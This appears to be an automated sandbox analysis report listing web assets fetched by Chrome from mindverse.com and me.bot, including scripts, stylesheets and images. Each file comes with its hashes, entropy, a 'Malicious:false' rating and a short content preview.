                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7023],{29492:function(e,t){"use strict";function n(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return n}})},57108:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:downloaded
                                      Size (bytes):23060
                                      Entropy (8bit):6.025591039015809
                                      Encrypted:false
                                      SSDEEP:384:QAJVpJqP9iZ8SHF66ZHf8wyYseYUPViRy4IAK6G7puyJEe5IAw+ZkJfEAHw:5JVpJA9ier6ZkwyY74rIt6G7MyuGIZXQ
                                      MD5:96606F7B04EDD4638029C9957B76EB0A
                                      SHA1:B6A815C07C49460E8188FB16086D71E6C0529502
                                      SHA-256:77BEBB74806C4C99307A8CFF3DE0AAEEBEB0D479A6E1F92664396BFAEDDE0767
                                      SHA-512:0E9328ECFA6C6DEFC21197FE5ED890895FF78AB27A255CE53C0DD1D139BE1159085D9B0B2B92ACFBA0062BAE790F54D53B0D1E08554EE2BB8D08DA2A94545D68
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/assets/onboarding/get_understanding.svg
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="84.4800033569336" height="48" viewBox="0 0 84.4800033569336 48"><defs><pattern x="0" y="0" width="84.4800033569336" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_090086"><image x="0" y="-9.536743199589637e-7" width="84.4800033569336" height="48.00000190734864" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAWAAAADICAYAAADWWTt7AAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7b15nBzVlef7OzciMiuz9kWlBQQlmdViEWCDELaRbIPYwcszjW3Gkhu3+824BzH2p/tN93sNdM9MT/eMH/i159MjY7vk9sywtD1GZhGL7SovCGEDEkhyg0WjEpKRKG1Vpco14t7z/rgRmZFZVaott8q6388nlFkRGRE365P61cnfPedcguGU9PVyWxpYycBKQTiTgTYG2qA3oPB5DwAwMETAkL9vAAAo/zikGPsBDBCw8/oNNFCZd2IwTA73rWlDOt0GS7SBhP5cK9kGoraCF5IYAAB43kBu1/XbB2CYFlTtAdQKW3u5h32hJcLFAHoY6KG8uJYFX6wHCNgZCLMA+o0wG8oFP7d6JUi0QcqVIJwJwkowrQS4BJ91GgIwAMJOMPaDMABgJ5zIAK3tH5rk5HnHvBXgrb3co4A1gnA1A2vgR681xIAAHpeM1+LA42s3kPnwGqYNb13VA0usAXA1GCsBXln
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):5132866
                                      Entropy (8bit):7.947570542192208
                                      Encrypted:false
                                      SSDEEP:49152:/O3Y55555558D4UvL4PDii9mlL04MmZO7r4WKdrnmjlYzkxwDFofAqMs1RSrw1Ry:m3r/tYr4JTvDifAqLRSMRMtH2xYHyG
                                      MD5:96118F2D6589234C737F66F98C3883FF
                                      SHA1:D67F5A4DF61C4ECBC94E776EFD2F0CA0F056243F
                                      SHA-256:CE92CA98CD0AF39D29BB51CD00FFCD188104C141835946F61B906BAAF368E0BA
                                      SHA-512:A8B617D2597324818C7498A76C11DCA72A76B2F9E1B88F903171F0F87A299B37E756C476889C0950E905018007A88C39CB150BCEC64B8425375C474D2927157E
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004165/gif-3.gif?number=1
                                      Preview:GIF89a.......L5-`X....-d{!.....J]..&..c........P*.......yy{.......+..x.~mP........uxVK._...f^@...e:1wyg.D)vo..b0zvE.n.LghzSO0.k....d9.Vk3..kW4..('"...1))...=**2) 3!!>).tjZ...<4(d;S...?23vif1.2..........hnAwJ=......hfVQ>;hegaNAfWVvos............R>9>J...aXf.N@.dR....bBvV[...PNL....ow.pf.........YS...KSi....u..c..xZUV.iPx....a.aB*.x.....4...}D.vC#.IO....*.yW.r`..L>.xE..............!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:FC0562B6CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:FC0562B7CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):23060
                                      Entropy (8bit):6.025591039015809
                                      Encrypted:false
                                      SSDEEP:384:QAJVpJqP9iZ8SHF66ZHf8wyYseYUPViRy4IAK6G7puyJEe5IAw+ZkJfEAHw:5JVpJA9ier6ZkwyY74rIt6G7MyuGIZXQ
                                      MD5:96606F7B04EDD4638029C9957B76EB0A
                                      SHA1:B6A815C07C49460E8188FB16086D71E6C0529502
                                      SHA-256:77BEBB74806C4C99307A8CFF3DE0AAEEBEB0D479A6E1F92664396BFAEDDE0767
                                      SHA-512:0E9328ECFA6C6DEFC21197FE5ED890895FF78AB27A255CE53C0DD1D139BE1159085D9B0B2B92ACFBA0062BAE790F54D53B0D1E08554EE2BB8D08DA2A94545D68
                                      Malicious:false
                                      Reputation:low
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="84.4800033569336" height="48" viewBox="0 0 84.4800033569336 48"><defs><pattern x="0" y="0" width="84.4800033569336" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_090086"><image x="0" y="-9.536743199589637e-7" width="84.4800033569336" height="48.00000190734864" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAWAAAADICAYAAADWWTt7AAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7b15nBzVlef7OzciMiuz9kWlBQQlmdViEWCDELaRbIPYwcszjW3Gkhu3+824BzH2p/tN93sNdM9MT/eMH/i159MjY7vk9sywtD1GZhGL7SovCGEDEkhyg0WjEpKRKG1Vpco14t7z/rgRmZFZVaott8q6388nlFkRGRE365P61cnfPedcguGU9PVyWxpYycBKQTiTgTYG2qA3oPB5DwAwMETAkL9vAAAo/zikGPsBDBCw8/oNNFCZd2IwTA73rWlDOt0GS7SBhP5cK9kGoraCF5IYAAB43kBu1/XbB2CYFlTtAdQKW3u5h32hJcLFAHoY6KG8uJYFX6wHCNgZCLMA+o0wG8oFP7d6JUi0QcqVIJwJwkowrQS4BJ91GgIwAMJOMPaDMABgJ5zIAK3tH5rk5HnHvBXgrb3co4A1gnA1A2vgR681xIAAHpeM1+LA42s3kPnwGqYNb13VA0usAXA1GCsBXln
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.934164316286191
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREjfMyqXXl6EW2FPXn:UrXiGlqX1jX
                                      MD5:3E8FC1BBE1BA8E95863FA9DF20A835AC
                                      SHA1:F05F8C8FA149AFBE4C0B0F9A3F90B7F92A6A490F
                                      SHA-256:D0B21A351D5CC1298D65F1EC2A560C85E7900683FC76A2FFBEA648AB153E5DC8
                                      SHA-512:E90772A88AA1FD61B4D4E608D41187CAD99951CC1E015369901F248D9F9351243CE460FC2B5AA83A8569F3B80E85B294CEAE1158B2541B33A3F6B6C219D28450
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__6
                                      Preview:/**/ typeof branch_callback__6 === 'function' && branch_callback__6("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):599530
                                      Entropy (8bit):5.478554671987132
                                      Encrypted:false
                                      SSDEEP:6144:llRpaKIMm56k66CLrhwnV5ps4nvNDWiTeX5o8UHJwG//pGB5R7pz61rElnHGX8PD:ll6KIMm52/hd+9WqcN7GX8PdaUjAU
                                      MD5:F0A041DBA0B230B7C07A1515D81DF4D6
                                      SHA1:48A11E4E4BD36CA814FF00FEA4058664462113D3
                                      SHA-256:EDD6E99BD407BF8DE4CF678F323113A3FFEACE75C58ACE2A19577F8BA7176939
                                      SHA-512:33A3FC653DE2047AE57042761F2B883D72537D7968ACAFC1F62433C09768D1E3836AD552EE8AB8D14AEC54F226AD5E4FE0334CE4E6CEBCB80572CBB955249304
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/1025-e8953ee90888594c.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1025],{65430:function(e,t,n){"use strict";n.d(t,{Z:function(){return l}});var r=n(83590),i=n(2265),o={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M433.1 657.7a31.8 31.8 0 0051.7 0l210.6-292c3.8-5.3 0-12.7-6.5-12.7H642c-10.2 0-19.9 4.9-25.9 13.3L459 584.3l-71.2-98.8c-6-8.3-15.6-13.3-25.9-13.3H315c-6.5 0-10.3 7.4-6.5 12.7l124.6 172.8z"}},{tag:"path",attrs:{d:"M880 112H144c-17.7 0-32 14.3-32 32v736c0 17.7 14.3 32 32 32h736c17.7 0 32-14.3 32-32V144c0-17.7-14.3-32-32-32zm-40 728H184V184h656v656z"}}]},name:"check-square",theme:"outlined"},a=n(97009),l=i.forwardRef(function(e,t){return i.createElement(a.Z,(0,r.Z)({},e,{ref:t,icon:o}))})},46622:function(e,t,n){"use strict";n.d(t,{Z:function(){return l}});var r=n(83590),i=n(2265),o={icon:{tag:"svg",attrs:{"fill-rule":"evenodd",viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M799.86 166.31c.02 0 .04.02.08.06l5
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (2427), with no line terminators
                                      Category:downloaded
                                      Size (bytes):2427
                                      Entropy (8bit):5.103878041136826
                                      Encrypted:false
                                      SSDEEP:48:RfcL4fwuUdXbF6m1GAAzVKo9l/OcrSQKPK4kWFjK4kCwZK4kCwD94:CCSbGR5Ko9lcjg24
                                      MD5:522AB750F2B72714436B0F4A769823DA
                                      SHA1:6F0173ADA249A4BFAB55A477C91758D5E6FB5DD7
                                      SHA-256:C307410422868760A55108E323295FCE165A3553EB41728726585A0D2AEF7E26
                                      SHA-512:11322A2C7252D3C86AB7D3B1CE5F705D4BCF81750F7E5E24AF1CB66E720E27FE4825E8386F401F1C07927529548195A76BA534E7A7C353201EB6227634508675
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/cbcc1c40530aeac6.css
                                      Preview:.index_tabItem___Z_7a{position:relative;display:flex;flex-direction:column;align-items:center;width:100%;height:64px;cursor:pointer;transition:height .5s}.index_tabItem___Z_7a .index_overlayClassNameMenuTip__gBWuW .ant-popover-content .ant-popover-inner .ant-popover-inner-content{padding:8px 16px}.index_tabItem___Z_7a .index_icon__8KUL3{width:44px;height:44px;padding:12px;color:#2f2f40;font-size:20px;background-color:rgba(254,253,255,.3);border-radius:50%;transition-duration:.5s;transition-property:color,background-color}.index_tabItem___Z_7a .index_title__nwjRh{color:#acabb3;font-weight:500;font-size:12px;line-height:20px;transition:color .5s;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.index_tabItem___Z_7a .index_tabIcon__RnFFs{position:relative}.index_tabItem___Z_7a.index_active__HbTYi .index_icon__8KUL3,.index_tabItem___Z_7a:hover .index_icon__8KUL3{color:var(--primary-black);background-color:var(--primary-white)}.index_tabItem___Z_7a .index_dot__mcpBz{position:absolu
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (19711), with no line terminators
                                      Category:downloaded
                                      Size (bytes):19711
                                      Entropy (8bit):5.247636708420499
                                      Encrypted:false
                                      SSDEEP:384:Gcm9JKCDqQwjQyEbZZZeJd32lHtG62ikHZnmA4RvQD0T+gda21n:pmpXBRvQQS929
                                      MD5:B4DEE79469A945D6FD6FC048973E016F
                                      SHA1:D48CA2D4FFDB3E16ED192E8B12B9D775E2A1A9B8
                                      SHA-256:15D2F0C17FE9A48607CBD29A4FAC0278B07F368BF53C85FC1D360771879E0699
                                      SHA-512:9A570281C08431FFE5A4C650C066B67111157C314012B0F05EC9726B707535DD8C5770D0BD56651F77DF988CBFEE4B866044306E7BEC8F6A692AC92637D32295
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/ba79f78e2680ba23.css
                                      Preview:.index_scrollContainer__W4whZ{flex-grow:1;padding:28px 60px;transition:all .3s;overflow-y:auto}.index_scrollContainer__W4whZ::-webkit-scrollbar{width:2px;background-color:transparent;border-radius:2px}.index_scrollContainer__W4whZ::-webkit-scrollbar-thumb,.index_scrollContainer__W4whZ::-webkit-scrollbar-track{background-color:transparent;border-radius:1px}.index_scrollContainer__W4whZ:hover::-webkit-scrollbar{background-color:#f4f4f4}.index_scrollContainer__W4whZ:hover::-webkit-scrollbar-thumb{background-color:var(--primary-color)}.index_scrollContainer__W4whZ:hover::-webkit-scrollbar-track{background-color:#f4f4f4}.index_scrollContainer__W4whZ:not(:first-child){opacity:0}.index_scrollContainer__W4whZ.index_homeFlowNoChat__NfOOb:dir(ltr){padding-right:152px}.index_scrollContainer__W4whZ.index_homeFlowNoChat__NfOOb:dir(rtl){padding-left:152px}.index_container__66CXT{margin-bottom:24px}.index_container__xUFRT .index_title__4vZiq{color:var(--zero-point-six-black)}.index_container__xUFRT .
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (8974), with no line terminators
                                      Category:downloaded
                                      Size (bytes):8974
                                      Entropy (8bit):5.271742644890172
                                      Encrypted:false
                                      SSDEEP:96:4frFhr7nrNEmOMBiiTXAXQ4WRiO4dBZ0ARP4rIOEB7A4q4ciOhBIn54Pv9IDAJjB:4frFhrODiTQLLOOGMOlG3Oo0xJ3RJ9
                                      MD5:983CBE8395685A90F3464719D18E95B1
                                      SHA1:AFA7CAB12EED95706CFBC873691CF5357C6129DC
                                      SHA-256:B691DA9BFD23A530BC0F8A8801D303972391A2D6A49100B89649ADF506A2DD6B
                                      SHA-512:F30F5BB207982390C2610B3601B8BCC3781F7B9345FF9CD098936AE3EB901C99339F3B9DED7C115AD2AB1C18E0A1A3110797A1F3B2C6EF8806EF18A5CE4E6142
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/8f7dbade64b88b25.css
                                      Preview:.index_overlayClassName__KTwI6{z-index:2000}.index_overlayClassName__KTwI6 .ant-popover-content .ant-popover-inner{padding:4px;background:var(--primary-white);border:1px solid #e5e5e5;box-shadow:0 2px 8px 0 rgba(0,0,0,.1)}.index_popoverContentContainer__EAKyV{display:flex;flex-direction:column;width:120px}.index_popoverContentContainer__EAKyV .index_itemContainer__NlG2u{display:flex;align-items:center;height:28px;padding:0 12px;color:var(--primary-black);font-size:12px;line-height:20px;transition:color .2s}.index_popoverContentContainer__EAKyV .index_itemContainer__NlG2u .index_icon__pK_KK{width:16px;height:16px;margin-right:8px;font-size:16px}.index_popoverContentContainer__EAKyV .index_itemContainer__NlG2u .index_questionCircle__atFHW{width:14px;height:14px;margin-left:4px;color:var(--primary-dark-gray);font-size:14px;cursor:pointer;transition:color .3s}.index_popoverContentContainer__EAKyV .index_itemContainer__NlG2u .index_questionCircle__atFHW:hover{color:var(--primary-sub-color)}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (475), with no line terminators
                                      Category:downloaded
                                      Size (bytes):475
                                      Entropy (8bit):5.079166872798927
                                      Encrypted:false
                                      SSDEEP:6:XzjbdHhjbzriSWlLblAXPuUoJXoPPLOXoPjqXoPJXoPbwXoPOdcdrXYb7zlhcya8:fbjipOTwXoLOXdXuXDXQDQ7zwfobMt6
                                      MD5:3210A66705F362CC198AF0C18EA9279E
                                      SHA1:32BCAEF25D35087CB083365F1407EF218705F059
                                      SHA-256:C2C120A757A3D4302A693D45E0A57B19A89DF7D15242650178DAFB4497C179A1
                                      SHA-512:893330AF516343CFADE944AAF56D6483DC14492DE0393F66504CB335E1BE6B93C527F345097B60FDCB154A3ED5885482D0DFEF6A945FD0B4C506BC21B032F8D1
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/main-app-55bbd77d79f9187f.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1744],{46907:function(e,n,t){Promise.resolve().then(t.t.bind(t,95751,23)),Promise.resolve().then(t.t.bind(t,66513,23)),Promise.resolve().then(t.t.bind(t,76130,23)),Promise.resolve().then(t.t.bind(t,39275,23)),Promise.resolve().then(t.t.bind(t,16585,23)),Promise.resolve().then(t.t.bind(t,61343,23))}},function(e){var n=function(n){return e(e.s=n)};e.O(0,[2971,7023],function(){return n(11028),n(46907)}),_N_E=e.O()}]);
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (10976), with no line terminators
                                      Category:downloaded
                                      Size (bytes):10976
                                      Entropy (8bit):5.654260735317943
                                      Encrypted:false
                                      SSDEEP:192:Hb9t6Ux/toMBkVMbFneBY4VpY7J9ox4cwGv2xD/0qZdsFVp6Z6:Hb9t6Ux/toMYi85VpY7J9ox4cwGqjREZ
                                      MD5:DBA1F698A614FAFAF3A9625324E6372D
                                      SHA1:2D8BAC0C079F20F6E5FBC30D02F15560E2EB096B
                                      SHA-256:52B53D6356E35951A04D8F5FE9BCA62B7BA4F19B0CE4BE288B7A51F976D14FA2
                                      SHA-512:DB73AE0F0704BFCB91BCE59F169D4F0AF7611804715A4A58B35AECE470231990980C2AB1456552FCA2394ADE0E7D408E5D316B312D410477FD373B65810CA180
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(mobileLayout)/(PALayout)/home-mobile/page-c884621e7c19b09d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2445],{69121:function(e,_,m){Promise.resolve().then(m.bind(m,50699))},16463:function(e,_,m){"use strict";var n=m(71169);m.o(n,"usePathname")&&m.d(_,{usePathname:function(){return n.usePathname}}),m.o(n,"useRouter")&&m.d(_,{useRouter:function(){return n.useRouter}}),m.o(n,"useSearchParams")&&m.d(_,{useSearchParams:function(){return n.useSearchParams}}),m.o(n,"useSelectedLayoutSegment")&&m.d(_,{useSelectedLayoutSegment:function(){return n.useSelectedLayoutSegment}}),m.o(n,"useSelectedLayoutSegments")&&m.d(_,{useSelectedLayoutSegments:function(){return n.useSelectedLayoutSegments}}),m.o(n,"useServerInsertedHTML")&&m.d(_,{useServerInsertedHTML:function(){return n.useServerInsertedHTML}})},50699:function(e,_,m){"use strict";m.r(_);var n=m(16463),t=m(2265),o=m(64671),E=m(47835),r=m(87170),i=m(10433);_.default=function(){let e=(0,t.useRef)(null),[_]=(0,E.Z)("layoutSize"),m=(0,n.useRouter)();return(0,t.useEffect)(()=>{_&&_!==o.N.SMALL&&m
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (4931), with no line terminators
                                      Category:downloaded
                                      Size (bytes):4931
                                      Entropy (8bit):5.20655134219902
                                      Encrypted:false
                                      SSDEEP:96:uZTbR6Rv3yolIe68JjL2e96i8KJ3lfCoK2QHr7I0iyZfUPa/cj5yh:uV16RviKIe6GL2ekIfCoyxiyatyh
                                      MD5:0B6F3887E1729C22102C484F0F59E595
                                      SHA1:527F1A5B2A2E15121CFCD1F780BE51D6B07D7CFC
                                      SHA-256:2ACA1E5FF136563426DDE9F658D6F7B250C28B129C1A675E4B97DA000DAD553D
                                      SHA-512:99C640015C902CD87430EB5BE0CCEC103F6D461C01C18BFADAEC4CC8B523B9D872B2CC96FC11B1C720571F888E596EFA71041778A5E0182F652E063F953DA230
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/841.d3a41df3b4122e9b.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[841],{80841:function(t){var n;n=function(){"use strict";function t(){return(t=Object.assign||function(t){for(var n=1;n<arguments.length;n++){var e=arguments[n];for(var o in e)Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o])}return t}).apply(this,arguments)}var n,e,o,i=navigator.userAgent||"",a=function(t,n){for(var e=window.isNaN,o=t.split("."),i=n.split("."),a=0;a<3;a++){var c=Number(o[a]),r=Number(i[a]);if(c>r)return 1;if(r>c)return -1;if(!e(c)&&e(r))return 1;if(e(c)&&!e(r))return -1}return 0},c=/android/i.test(i),r=/iphone|ipad|ipod/i.test(i),s=/micromessenger\/([\d.]+)/i.test(i),u=/(weibo).*weibo__([\d.]+)/i.test(i),d=/(baiduboxapp)\/([\d.]+)/i.test(i),l=/qq\/([\d.]+)/i.test(i),p=/(qqbrowser)\/([\d.]+)/i.test(i),f=/qzone\/.*_qz_([\d.]+)/i.test(i),h=/chrome\/[\d.]+ mobile safari\/[\d.]+/i.test(i)&&c&&0>i.indexOf("Version");function v(t){var n=void 0!==t?Object.keys(t).map(function(n){return"".concat(n,"=").concat(t[n])})
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 1024 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):23835
                                      Entropy (8bit):7.42479860265329
                                      Encrypted:false
                                      SSDEEP:384:Wxq39CJXhsJLAox9D6rKcU3Jt8y7Q4X99b1ug0UwUG+zeuT7LdvGLaD8:oq392+8rzU5my79bAUxpzRdvQa4
                                      MD5:49EEDBB9725C99517C6E65C703E251A1
                                      SHA1:EDE6F1491A2A2BD30133E6F167AFC6917B3F8689
                                      SHA-256:A5C3F8CB73B7D92F9A2AC80786CA7F6698EB2B810139E465F527B9FF8EF3B95A
                                      SHA-512:03BA5441CFEA513A8B6B2E46D16C928C59B2A200CBD996971092CB1CFA7CAC86CCDFC1989E6BAB8C5E8AEC5DA072B087C1997145D804F02D08805C69C08BB4B9
                                      Malicious:false
                                      Reputation:low
                                      URL:https://frontdoorcdn.mindverse.ai/mindos-resource/front-img/img/zzzz202305241684919515802img_v2_73c02be6-b39d-4e3a-92fe-5a271c67209g.png
                                      Preview:.PNG........IHDR...............+.....pHYs...........~... .IDATx...o...}'./..Z.Z".h....89.=\....M.tf.s..D.l...... w9\.@..hM?..E............&..9..i...dU@.C.....{..#Y..V..Km.#.+.wf......|^/..=K%3..R.....|........Po.y....P.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@...2..S..8.R:...v...^K.k.{^....j..o+...^[.^X..{..#:...e..`.v.......).Gw....t..;..K.... '...#..3y.~2/.SW._..|T.....d........@\....C..}..<..?I.-w.....N...J..@x.V.|Wq......m..`.+ ...Pi...B.j..........P ?............B..m.................J.......}.hy;..G....P......gW.....<.X.:_`.C.`.....J.......>.....u..0L..................L/,-Z...K.........i.....#.0:........N......>...<.X.......%..`hv.....
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5960)
                                      Category:downloaded
                                      Size (bytes):306692
                                      Entropy (8bit):5.5943518217823645
                                      Encrypted:false
                                      SSDEEP:6144:EDZTqVIx5lGYr/p0JclZbN0N8yCVDc7G7:k4V+lGhJcZWy
                                      MD5:C328C7FCE1E3A34931CACAA59532AF28
                                      SHA1:C8E766CE758BE629E405C4B62B3D1F17CF015F1D
                                      SHA-256:9B610879593014D1C141DD22A810C0F3B9DE06B7B743CDE80582C4CBF1A6B605
                                      SHA-512:0D69924E16865AFA6744D3BCA6E76FAE332BB2D3E83986476DE85CD14D83571E58FB6C6F14C729BBBF6F21A92D58E17B3728C5E1BF7B99F62DF3DDC61293266C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.googletagmanager.com/gtag/js?l=dataLayer&id=G-MDCC7BHCT1
                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (13881)
                                      Category:downloaded
                                      Size (bytes):19168
                                      Entropy (8bit):5.299325277353965
                                      Encrypted:false
                                      SSDEEP:96:Q0y+cz20pvj2j5Ngeuj7jcrwJ3Avznml0S352/5BACD0cTWSVHc6sFlZiurvci4q:FyzpSr4J3AvUemJ3AvhjJ3Av/E1UgG
                                      MD5:F5DB6752B44B02790C443EAE81062B19
                                      SHA1:101651458F02A819F8CDC4D35B097D8B4BF82687
                                      SHA-256:C090C0BBE48A2521EC37925B121998962BE575EE4F1E5D3A7F9A438443D89B31
                                      SHA-512:5D8D93C72B462BA23E6A8697474EC0DFBA792E0F6A808D70662169493F7609352D862E7D04F9C64F3D6068A0023C7885443DC4E29AE545D12AA5EE1C62A4A016
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/memory/detail?_rsc=1m3fu
